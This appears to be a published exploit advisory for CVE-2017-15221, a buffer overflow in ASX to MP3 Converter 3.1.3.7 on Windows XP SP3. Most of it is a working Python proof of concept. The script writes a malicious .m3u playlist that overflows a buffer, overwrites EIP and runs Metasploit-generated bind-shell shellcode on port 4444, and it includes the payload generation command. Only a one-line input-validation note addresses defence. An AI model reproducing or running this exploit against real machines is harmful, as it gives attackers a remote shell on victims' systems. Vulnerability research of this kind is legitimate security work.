ASX To MP3 3.1.3.7 Buffer Overflow
Posted on 12 October 2017
# Exploit Title: Buffer Overflow via crafted malicious .m3u file # Exploit Author: Parichay Rai # Tested on: XP Service Pack 3 # CVE : CVE-2017-15221 Description ------------ A buffer overflow Attack possible due to improper input mechanism Proof of Concept ---------------- #!/usr/bin/python #This exploit generates a malicious playlist for the asx to mp3 converter 3.1.3.7.2010. #This is an exploit that work well against a windows XP3 systems! #Successful exploit gives you a bind shell on 4444 BadChar= "x00x0ax0dx20" # Payload Generation Command: msfpayload windows/shell_bind_tcp EXITFUNC=none R | msfencode -a x86 -b "x00x0ax0dx20" -f c # Successful exploitation opens port 4444 on the victim Machine shellcode=("xd9xeexbfxadx07x92x3exd9x74x24xf4x5ex2bxc9" + "xb1x56x31x7ex18x03x7ex18x83xc6xa9xe5x67xc2" + "x59x60x87x3bx99x13x01xdexa8x01x75xaax98x95" + "xfdxfex10x5dx53xebxa3x13x7cx1cx04x99x5ax13" + "x95x2fx63xffx55x31x1fx02x89x91x1excdxdcxd0" + "x67x30x2ex80x30x3ex9cx35x34x02x1cx37x9ax08" + "x1cx4fx9fxcfxe8xe5x9ex1fx40x71xe8x87xebxdd" + "xc9xb6x38x3ex35xf0x35xf5xcdx03x9fxc7x2ex32" + "xdfx84x10xfaxd2xd5x55x3dx0cxa0xadx3dxb1xb3" + "x75x3fx6dx31x68xe7xe6xe1x48x19x2bx77x1ax15" + "x80xf3x44x3ax17xd7xfex46x9cxd6xd0xcexe6xfc" + "xf4x8bxbdx9dxadx71x10xa1xaexdexcdx07xa4xcd" + "x1ax31xe7x99xefx0cx18x5ax67x06x6bx68x28xbc" + "xe3xc0xa1x1axf3x27x98xdbx6bxd6x22x1cxa5x1d" + "x76x4cxddxb4xf6x07x1dx38x23x87x4dx96x9bx68" + "x3ex56x4bx01x54x59xb4x31x57xb3xc3x75x99xe7" + "x80x11xd8x17x37xbex55xf1x5dx2ex30xa9xc9x8c" + "x67x62x6exeex4dxdex27x78xd9x08xffx87xdax1e" + "xacx24x72xc9x26x27x47xe8x39x62xefx63x02xe5" + "x65x1axc1x97x7ax37xb1x34xe8xdcx41x32x11x4b" + "x16x13xe7x82xf2x89x5ex3dxe0x53x06x06xa0x8f" + "xfbx89x29x5dx47xaex39x9bx48xeax6dx73x1fxa4" + "xdbx35xc9x06xb5xefxa6xc0x51x69x85xd2x27x76" + "xc0xa4xc7xc7xbdxf0xf8xe8x29xf5x81x14xcaxfa" + "x58x9dxa0xc0x80xbfxdcx6cxd1xfdx80x8ex0cxc1" + "xbcx0cxa4xbax3ax0cxcdxbfx07x8ax3exb2x18x7f" + "x40x61x18xaa") buffer="http://" buffer+="A"*17417 buffer+="x53x93x42x7e" #(overwrites EIP in windows XP service pack 3 with the address of user32.dll) buffer+="x90"*10 #NOPs buffer+=shellcode buffer+="x90"*10 #NOPs f=open("exploit.m3u","w") f.write(buffer); f.close() ---------------------- Affected Targets --------------------- ASX to MP3 version 3.1.3.7 and May be less Solution --------------- Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing "junk" characters, etc. Credits ---------- Offensive Security Rebellious Ceaser
